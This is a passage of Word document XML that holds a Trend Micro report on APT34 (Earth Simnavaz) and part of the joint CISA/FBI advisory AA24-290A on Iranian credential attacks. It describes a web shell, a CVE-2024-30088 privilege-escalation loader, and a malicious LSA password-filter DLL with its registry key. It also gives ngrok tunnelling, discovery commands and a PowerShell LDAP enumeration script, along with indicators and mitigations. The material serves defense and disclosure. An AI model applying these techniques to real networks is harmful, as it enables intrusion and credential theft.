          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/j/understanding-the-initial-stages-of-web-shell-and-vpn-threats-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>an.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East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 Micro's investigation into the recent activity of Earth Simnavaz provides new insights into the APT group's evolving tactics and the immediate threat it poses to sectors in the Middle East.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Mohamed Fahmy, Bahaa Yamany, Ahmed Kamal, Nick Dai October 11, 2024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Subscribe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Summary Trend Micro researchers have been monitoring a cyber espionage group known as Earth Simnavaz, also referred to as APT34 and OilRig, which has been actively targeting leading entities in the Middle East.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The group utilizes sophisticated tactics that include deploying backdoors that leverage Microsoft Exchange servers for credentials theft, and exploiting vulnerabilities like CVE-2024-30088 for privilege escalation. Earth Simnavaz's uses a combination of customized .NET tools, PowerShell scripts, and IIS-based malware to allow their malicious activity to blend in with normal network traffic and avoid traditional detection methods. Their recent activity suggests that Earth Simnavaz is focused on abusing vulnerabilities in key infrastructure of geopolitically sensitive regions. They also seek to establish a persistent foothold in compromised entities, so these can be weaponized to launch attacks on additional targets.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Recently, Trend Micro has been tracking Earth Simnavaz (also known as APT34 and OilRig), a cyber espionage group. This group primarily targets organizations in the energy sector, particularly those involved in oil and gas, as well as other infrastructure. It is known for using sophisticated tactics, techniques, and procedures (TTPs) to gain unauthorized access to networks and exfiltrate sensitive information.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recent months, there has been a notable rise in cyberattacks attributed to this APT group specifically targeting infrastructure in the Middle East region. This escalation in activity underscores the group's ongoing commitment to exploiting vulnerabilities within infrastructure frameworks in these geopolitically sensitive areas.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Our latest research has identified Earth Simnavaz's deployment of a sophisticated new backdoor, which bears striking similarities to malware related to this APT group, as documented in our previous research. This new backdoor facilitates the exfiltration of sensitive credentials, including accounts and passwords, through on-premises Microsoft Exchange servers. Such tactics not only reflect the group's evolving methodologies but also highlight the persistent threat posed to organizations reliant on these platforms.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Moreover, Earth Simnavaz has been observed using the same technique of abusing the dropped password filter policy as detailed in our earlier findings. This technique enables attackers to extract clean-text passwords, further compromising the integrity of targeted systems.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addition to these methods, the group has leveraged a remote monitoring and management (RMM) tool known as ngrok in their operations. This tool allows for the seamless tunneling of traffic, providing attackers with an effective means to maintain persistence and control over compromised environments.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threat actors have also recently added CVE-2024-30088 to their toolset, exploiting this vulnerability for privilege escalation in targeted systems. Integrating this into their toolkit highlights Earth Simnavaz's continuous adaptation by exploiting newer vulnerabilities to make their attacks stealthier and more effective.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Earth Simnavaz's activities highlight the ongoing threat posed by state- sponsored cyber actors, particularly in sectors vital to national security and economic stability. As the threat landscape continues to evolve, understanding the tactics these groups use is crucial for developing effective defense strategies against such sophisticated adversaries. Attack chain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initial point of entry for these attacks has been traced back to a web shell uploaded to a vulnerable web server (Figure 1). This web shell not only allows the execution of PowerShell code but also enables attackers to download and upload files from and to the server, thereby expanding their foothold within the targeted networks.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Once inside the network, the APT group leveraged this access to download the ngrok remote management tool, facilitating lateral movement and enabling them to reach the Domain Controller. During their operations, the group exploited CVE-2024-30088 - the Windows Kernel Elevation of Privilege vulnerability - as a means of privilege escalation, utilizing an exploit binary that was loaded into memory via the open-source tool RunPE-In-Memory.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allowed them to register a password filter DLL, which subsequently dropped a backdoor responsible for exfiltrating sensitive data through the Exchange server. The exfiltrated data was relayed to a mail address controlled by the threat actor, effectively completing the infection chain and ensuring the attackers maintained control over the compromised environment.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 Attack chain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download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Earth Simnavaz has been known to leverage compromised organizations to conduct supply chain attacks on other entities. We expected that the threat actor could use the stolen accounts to initiate new attacks through phishing against additional targets.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There is also a documented overlap between Earth Simnavaz and another APT group, FOX Kitten. In August, an alert from the Cybersecurity and Infrastructure Security Agency (CISA) highlighted FOX Kitten's role in enabling ransomware attacks targeting organizations in the US and the Middle East. These threats should be taken seriously, as the potential impact on compromised entities could be significant. Observed toolset and techniques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 initial infection was detected when a web shell was uploaded to a vulnerable web server. This web shell extracts values from HTTP request headers ("func" and "command"), as shown in Figure 2. By passing both arguments to other functions, the web shell allows the threat actor to perform various actions (Table 1):</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Command Function Execute PowerShell Command on infected server func=Exc &amp; Command= PW command to be executed Download specific file from infected server func=Exc &amp; Command= FilePath Upload File into infected server func=Exc &amp; Command = content of file to be written on infected server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 Capabilities provided by the web shell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2. Values extracted from HTTP request headers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download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web shell also decrypts arguments received from the threat actor. It takes a Base64-encoded, AES-encrypted string, decrypts it using a specified key and initialization vector (IV), and returns the decrypted plaintext (Figure 3).</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3. Decrypted string</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download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response sent back to the threat actor is encrypted using a different function. This response is encrypted with AES using the given key IV. The resulting encrypted string is Base64-encoded (Figure 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4. Response sent back to the threat actor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download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Exploiting CVE-2024-30088 for persistence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the web shells were implanted on the victim machines, another file called "r.exe" was dropped and executed. This is a simple loader that takes the first argument as the input file, decodes it in one-byte-XOR operation, and executes it. The codes in this loader were reused from an open-source tool (Figure 5). The payload file was encoded to bypass traditional detection methods.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5. Decoding routine in r.exe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download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payload file called "p.enc" comes with the loader under the same folder. The decoded payload turns out to be a privilege escalation tool. As its PDB string represents, this tool exploits CVE-2024-30088:</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C:\Users\reymond\Desktop\CVE-2024-30088-main\x64\Release\poc.pdb</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vulnerability, which was patched in June, allows threat actors to run arbitrary code in the context of SYSTEM and it works on multiple versions of Windows 10 and 11.</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Our analysis showed that the codes were reused from an open-source project (Figure 6). By using RunPE-In-Memory, combined with CVE-2024-30088, the threat actor was able to carry out their malicious actions stealthily.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6. Reused code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download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privilege escalation tool is coded to execute another dropped executable named "t.exe", a .NET-compiled installer that creates persistence by using the predefined task definition "e.xml". The installed schedule task is for executing the script "u.ps1". The final "u.ps1" we collected seemed to be replaced with a useless script, leading us to suspect that the threat actors intentionally altered the script and disrupted the incident investigation.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7. Creating persistence using "e.xml"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download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Abusing the dropped password filter policy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 mentioned earlier, the threat actor has been observed utilizing a tool similar to one identified in our previous research on the same entity. This tool exploits on-premises Exchange servers to exfiltrate credentials to email accounts under their control.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Additionally, abusing the dropped password filter policy has been detected as a method for acquiring credentials, which are then exfiltrated via email. Threat actors can manipulate password filters to intercept or retrieve credentials from domain users via domain controllers or local accounts on local machines. This exploitation occurs because the password validation process necessitates the plaintext password from the Local Security Authority (LSA).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Consequently, deploying and registering a malicious password filter can facilitate credential harvesting each time a user updates their password. This technique necessitates elevated privileges (local administrator access) and can be executed through the following steps: Password Filter psgfilter.dll be dropped into C:\Windows\System32 Registry key modification to register the Password Filter [DLL HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Notification Packages = scecli, psgfilter]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using this technique, the threat actor can capture and harvest every password from compromised machines, even after they have been modified. The malicious DLL includes three exported functions (Figure 9) that facilitate the primary functionality of registering the DLL with the LSA (Figure 8): InitializeChangeNotify: Indicates that a password filter DLL is initialized. PasswordChangeNotify: Indicates that a password has been changed.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PasswordFilter: Validates a new password based on password policy.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8. Registering the DLL with the LSA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download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9. Functions exported by DLL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download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malicious actor took great care in working with the plaintext passwords while implementing the password filter export functions. Similar to the incident in our previous research, the threat actor also utilized plaintext passwords to gain access and deploy tools remotely. The plaintext passwords were first encrypted before being exfiltrated when sent over networks. Exfiltrating data through legitimate mail traffic</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primary function of the exfiltration tool (identified by Trend Micro as STEALHOOK involves retrieving valid domain credentials from a specific location, which it then uses to access the Exchange Server for data exfiltration. The key objective of this stage is to capture the stolen passwords and transmit them to the attackers as email attachments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Additionally, we observed that the threat actors leverage legitimate accounts with stolen passwords to route these emails through Exchange Servers.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backdoor exhibits significant similarities to one previously attributed to the same group in our earlier research. The main functionalities of the backdoor can be categorized as follows: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Retrieving User Credentials (Figure 10) - Calls the GetUserPassFromData function to retrieve the username and password needed for authentication from this file: C:\ProgramData\WindowsUpdateService\UpdateDir\edf</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10. The backdoor retrieving user credentials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download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Retrieving Email Sending Data (Figure 11) - Calls the GetSendData function to retrieve necessary configuration data for sending an email from this file: C:\ProgramData\WindowsUpdateService\UpdateDir\edf</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Server: The specific Exchange mail server for the targeted victim where the data is leaked through.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Target: The email addresses through which the malicious actors receive the exfiltrated data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain: The internal active directory (AD) domain name related to the targeted entity.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11. The backdoor retrieving email sending data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download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Sending Email (Figure 12) - If the configuration data retrieval is successful, the program constructs a message containing the user credentials and the configuration data. The email is sent with a specified subject and body, and all files in the following directory are attached: C:\ProgramData\WindowsUpdateService\UpdateDir Email Subject: "Update Service" Body: "Update Service Is Running..."</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12. The backdoor sending emails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download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Using RMM tools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threat actor recently upgraded their toolkit by incorporating RMM tools such as ngrok in their latest attacks. Ngrok is a legitimate tool used to create secure tunnels from a local machine to the internet, allowing access to internal services through public URLs. However, cyber attackers can exploit ngrok to bypass firewalls and network security controls for malicious purposes. They may use it to establish command-and-control (C&amp;C) communication, exfiltrate sensitive data, or deploy payloads by creating undetected tunnels between compromised machines and their servers, making it harder for security teams to detect suspicious activity.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ngrok tool was downloaded onto the server using a PowerShell script (Figure 13), after which a WMI command was utilized to authenticate to a remote server, copy the file, and execute it remotely.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13. Downloading ngrok</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download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appears that the threat actor utilized this tool in the later stages of the attack, leveraging a valid account and password for authentication. These credentials were likely obtained during earlier phases of the operation, in which accounts and passwords were stolen and exfiltrated. Attribution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Multiple data points and indicators attribute this attack to Earth Simnavaz, with evidence showing that the group remains active, specifically targeting Middle Eastern countries. This campaign, like that in our previously reported research, involved the targeting of Exchange servers and relaying communications through them. A significant similarity has been observed at both the code and functionality levels between the Exchange backdoor used in this attack and the one seen in the earlier campaign. Additionally, both tools share characteristics with the Karkoff backdoor, which is also linked to the same threat actors and exploits the Exchange Web Services (EWS) API for malicious activities. Earth Simnavaz's tactics also overlap with that of FOX Kitten, another threat group which likewise has been observed using the RMM tool ngrok. Trend Micro Vision One Threat Intelligence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 stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.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 Micro Vision One Intelligence Reports App [IOC Sweeping]</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Advanced Cyberattacks Against Gulf Regions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Earth Simnavaz Levies Advanced Cyberattacks Against Gulf Regions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 Micro Vision One Threat Insights App</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Threat Actor/s: Earth Simnavaz Conclusion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APT groups like Earth Simnavaz have become increasingly active, particularly in targeting infrastructure in the Middle East. Based on the group's toolset and activities, it's evident that they aim to establish a persistent presence within compromised entities, using the affected infrastructure to launch further attacks on additional targets. Their primary goals appear to be espionage and the theft of sensitive information.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Earth Simnavaz continues to rely on IIS-based malware such as web shells, customized .NET tools, and PowerShell scripts as core components of their attack arsenal. Recent campaigns have confirmed this technique remains actively in use. Geopolitical tensions likely play a significant role in this surge, so the Middle East should take these threats seriously. Earth Simnavaz's approach involves blending into normal network activity and customizing its malware to avoid detection.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Intelligence-driven incident response will be essential in effectively managing and mitigating these types of attacks. While the group's techniques haven't evolved drastically, implementing a Zero Trust architecture, alongside mature SOC, EDR, and MDR capabilities, can greatly enhance defensive measures against threats like that posed by Earth Simnavaz.</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Indicators of Compromise (IOCs)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SHA-256 Detection Description 6e4f237ef084e400b43bc18860d9c781c851012652b558f57527cf61bee1e1ef Trojan.PS1.DULLDROP.I624 temp.ps1 b3257f0c0ef298363f89c7a61ab27a706e9e308c22f1820dc4f02dfa0f68d897 Trojan.Win64.DULLOAD.I t.exe abfc8e9b4b02e196af83608d5aaef1771354b32c898852dff532bd8cfd2ce59d Backdoor.ASP.DULLWSHELL.I624 Defaults.aspx 43c83976d9b6d19c63aef8715f7929557e93102ff0271b3539ccf2ef485a01a7 N/A u.ps1 ca98a24507d62afdb65e7ad7205dfe8cd9ef7d837126a3dfc95a74af873b1dc5 Backdoor.ASP.DULLWSHELL.I624 Defaults.aspx 7ebbeb2a25da1b09a98e1a373c78486ed2c5a7f2a16eec63e576c99efe0c7a49 N/A Microsoft.Exchange.WebServices.dll c0189edde8fa030ff4a70492ced24e325847b04dba33821cf637219d0ddff3c9 Backdoor.ASP.DULLWSHELL.I624 Logout.aspx 6d8bdd3e087b266d493074569a85e1173246d1d71ee88eca94266b5802e28112 HackTool.Win64.CVE202430088.I p.enc db79c39bc06e55a52741a9170d8007fa93ac712df506632d624a651345d33f91 TrojanSpy.MSIL.STEALHOOK.A Update.dll 27a0e31ae16cbc6129b4321d25515b9435c35cc2fa1fc748c6f109275bee3d6c Contains the task of that t.exe source e.xml 54e8fbae0aa7a279aaedb6d8eec0f95971397fea7fcee6c143772c8ee6e6b498 Trojan.Win64.DULLOAD.I r.exe a24303234e0cc6f403fca8943e7170c90b69976015b6a84d64a9667810023ed7 Trojan.Win64.STEALHOOK.A passwin.dll 1169d8fe861054d99b10f7a3c87e3bbbd941e585ce932e9e543a2efd701deac2 HackTool.PS1.DullScan.I p.ps1 af979580849cc4619b815551842f3265b06497972c61369798135145b82f3cd8 Trojan.PS1.DULLDROP.I j.ps1 1d2ff65ac590c8d0dec581f6b6efbf411a2ce5927419da31d50156d8f1e3a4ff Backdoor.ASP.DULLWSHELL.I624 Defaults.aspx abfc8e9b4b02e196af83608d5aaef1771354b32c898852dff532bd8cfd2ce59d Backdoor.ASP.DULLWSHELL.I624 s.inc 98fb12a9625d600535df342551d30b27ed216fed14d9c6f63e8bf677cb730301 Renamed Ngrok n.exe edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef PSEXEC PsExec64.exe ca98a24507d62afdb65e7ad7205dfe8cd9ef7d837126a3dfc95a74af873b1dc5 Backdoor.ASP.DULLWSHELL.I624 Globals.aspx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Micro 2024.10.22 09:08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093949" w:rsidRDefault="00093949" w:rsidP="00093949">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Iranian Cyber Actors' Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations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Release Date October 16, 2024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Alert Code AA24-290A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Cybersecurity Best Practices, Multifactor Authentication, Organizations and Cyber Safety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Summary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Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Communications Security Establishment Canada (CSE), the Australian Federal Police (AFP), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) are releasing this joint Cybersecurity Advisory to warn network defenders of Iranian cyber actors' use of brute force and other techniques to compromise organizations across multiple critical infrastructure sectors, including the healthcare and public health (HPH), government, information technology, engineering, and energy sectors. The actors likely aim to obtain credentials and information describing the victim's network that can then be sold to enable access to cybercriminals.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Since October 2023, Iranian actors have used brute force, such as password spraying, and multifactor authentication (MFA) 'push bombing' to compromise user accounts and obtain access to organizations. The actors frequently modified MFA registrations, enabling persistent access. The actors performed discovery on the compromised networks to obtain additional credentials and identify other information that could be used to gain additional points of access. The authoring agencies assess the Iranian actors sell this information on cybercriminal forums to actors who may use the information to conduct additional malicious activity.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advisory provides the actors' tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). The information is derived from FBI engagements with entities impacted by this malicious activity.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authoring agencies recommend critical infrastructure organizations follow the guidance provided in the Mitigations section. At a minimum, organizations should ensure all accounts use strong passwords and register a second form of authentication.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Download the PDF version of this report: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AA24-290A Iranian Cyber Actors' Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations (PDF, 794.32 KB )</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a downloadable list of IOCs, see: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AA24-290A STIX XML (XML, 96.61 KB )</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AA24-290A STIX JSON (JSON, 81.92 KB ) Technical Details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Note: This advisory uses the MITRE ATT&amp;CK(R) for Enterprise framework, version 15. See the MITRE ATT&amp;CK Tactics and Techniques section in Appendix A for a table of the actors' activity mapped to MITRE ATT&amp;CK tactics and techniques. Overview of Activity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actors likely conduct reconnaissance operations to gather victim identity [T1589] information. Once obtained, the actors gain persistent access to victim networks frequently via brute force [T1110]. After gaining access, the actors use a variety of techniques to further gather credentials, escalate privileges, and gain information about the entity's systems and network. The actors also move laterally and download information that could assist other actors with access and exploitation. Initial Access and Persistence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actors use valid user and group email accounts [T1078], frequently obtained via brute force such as password spraying [T1110.003] although other times via unknown methods, to obtain initial access to Microsoft 365, Azure [T1078.004], and Citrix systems [T1133]. In some cases where push notification-based MFA was enabled, the actors send MFA requests to legitimate users seeking acceptance of the request. This technique- bombarding users with mobile phone push notifications until the user either approves the request by accident or stops the notifications- is known as "MFA fatigue" or "push bombing" [T1621].</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Once the threat actors gain access to an account, they frequently register their devices with MFA to protect their access to the environment via the valid account: In two confirmed compromises, the actors leveraged a compromised user's open registration for MFA [T1556.006] to register the actor's own device [T1098.005] to access the environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In another confirmed compromise, the actors used a self-service password reset (SSPR) tool associated with a public facing Active Directory Federation Service (ADFS) to reset the accounts with expired passwords [T1484.002] and then registered MFA through Okta for compromised accounts without MFA already enabled [T1556] [T1556.006].</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actors frequently conduct their activity using a virtual private network (VPN) service [T1572]. Several of the IP addresses in the actors' malicious activity originate from exit nodes tied to the Private Internet Access VPN service. Lateral Movement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actors use Remote Desktop Protocol (RDP) for lateral movement [T1021.001]. In one instance, the actors used Microsoft Word to open PowerShell to launch the RDP binary mstsc.exe [T1202]. Credential Access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actors likely use open-source tools and methodologies to gather more credentials. The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Kerberos tickets [T1558.003]. In one instance, the actors used the Active Directory (AD) Microsoft Graph Application Program Interface (API) PowerShell application likely to perform a directory dump of all AD accounts. Also, the actors imported the tool [T1105] DomainPasswordSpray.ps1, which is openly available on GitHub [T1588.002], likely to conduct password spraying. The actors also used the command Cmdkey /list, likely to display usernames and credentials [T1555]. Privilege Escalation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one instance, the actors attempted impersonation of the domain controller, likely by exploiting Microsoft's Netlogon (also known as "Zerologon") privilege escalation vulnerability (CVE-2020-1472) [T1068]. Discovery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actors leverage living off the land (LOTL) to gain knowledge about the target systems and internal networks. The actors used the following Windows command-line tools to gather information about domain controllers [T1018], trusted domains [T1482], lists of domain administrators, and enterprise administrators [T1087.002] [T1069.002] [T1069.003]: Nltest /dclist Nltest /domain_trusts Nltest /domain_trusts/all_trusts Net group "Enterprise admins" /domain Net group "Domain admins" /domain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Next, the actors used the following Lightweight Directory Access Protocol (LDAP) query in PowerShell [T1059.001]to search the AD for computer display names, operating systems, descriptions, and distinguished names [T1082].</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$i=0 $D= [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() $L='LDAP://' . $D $D = [ADSI]$L $Date = $((Get-Date).AddDays(-90).ToFileTime()) $str = '(&amp;(objectcategory=computer)(operatingSystem=*serv*)(|(lastlogon&gt;='+$Date+')(lastlogontimestamp&gt;='+$Date+')))'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$s = [adsisearcher]$str $s.searchRoot = $L.$D.distinguishedName $s.PropertiesToLoad.Add('cn') &gt; $Null $s.PropertiesToLoad.Add('operatingsystem') &gt; $Null $s.PropertiesToLoad.Add('description') &gt; $Null $s.PropertiesToLoad.Add('distinguishedName') &gt; $Null Foreach ($CA in $s.FindAll()) { Write-Host $CA.Properties.Item('cn') $CA.Properties.Item('operatingsystem') $CA. Properties.Item('description') $CA.Properties.Item('distinguishedName') $i++ } Write-host Total servers: $i Command and Control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 one occasion, using msedge.exe, the actors likely made outbound connections to Cobalt Strike Beacon command and control (C2) infrastructure [T1071.001]. Exfiltration and Collection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couple instances, while logged in to victim accounts, the actors downloaded files related to gaining remote access to the organization and to the organization's inventory [T1005], likely exfiltrating the files to further persist in the victim network or to sell the information online. Detection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 detect brute force activity, the authoring agencies recommend reviewing authentication logs for system and application login failures of valid accounts and looking for multiple, failed authentication attempts across all accounts.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 detect the use of compromised credentials in combination with virtual infrastructure, the authoring agencies recommend the following steps: Look for "impossible logins," such as suspicious logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the user's expected geographic location. Look for one IP used for multiple accounts, excluding expected logins. Look for "impossible travel." Impossible travel occurs when a user logs in from multiple IP addresses with significant geographic distance (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the period between the logins). Note: Implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks. Look for MFA registrations with MFA in unexpected locales or from unfamiliar devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the ntds.dit file from a domain controller.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Look for suspicious privileged account use after resetting passwords or applying user account mitigations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Look for unusual activity in typically dormant accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity. Mitigations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authoring agencies recommend organizations implement the mitigations below to improve organizations' cybersecurity posture based on the actors' TTPs described in this advisory. These mitigations align with the Cross- Sector Cybersecurity Performance Goals (CPGs) developed by CISA. The CPGs, which are organized to align to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, are a subset of cybersecurity practices, aimed at meaningfully reducing risks to both critical infrastructure operations and the American people. These voluntary CPGs strive to help small- and medium-sized organizations kick-start their cybersecurity efforts by prioritizing investment in a limited number of essential actions with high-impact security outcomes. Visit CISA's Cross- Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy for user verification or password strength, creating a security gap. Avoid common passwords (e.g. "Spring2024" or "Password123!").</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable user accounts and access to organizational resources for departing staff [CPG 2.D]. Disabling accounts can minimize system exposure, removing options actors can leverage for entry into the system. Similarly, create new user accounts as close as possible to an employee's start date. Implement phishing-resistant MFA [CPG 2.H]. See CISA's resources Phishing- Resistant Multifactor Authentication and More than a Password for additional information on strengthening user credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Continuously review MFA settings to ensure coverage over all active, internet-facing protocols to ensure no exploitable services are exposed [CPG 2.W].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Provide basic cybersecurity training to users [CPG 2.I] covering concepts such as: Detecting unsuccessful login attempts [CPG 2.G].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Having users deny MFA requests they have not generated.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensuring users with MFA-enabled accounts have MFA set up appropriately. Ensure password policies align with the latest NIST Digital Identity Guidelines.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
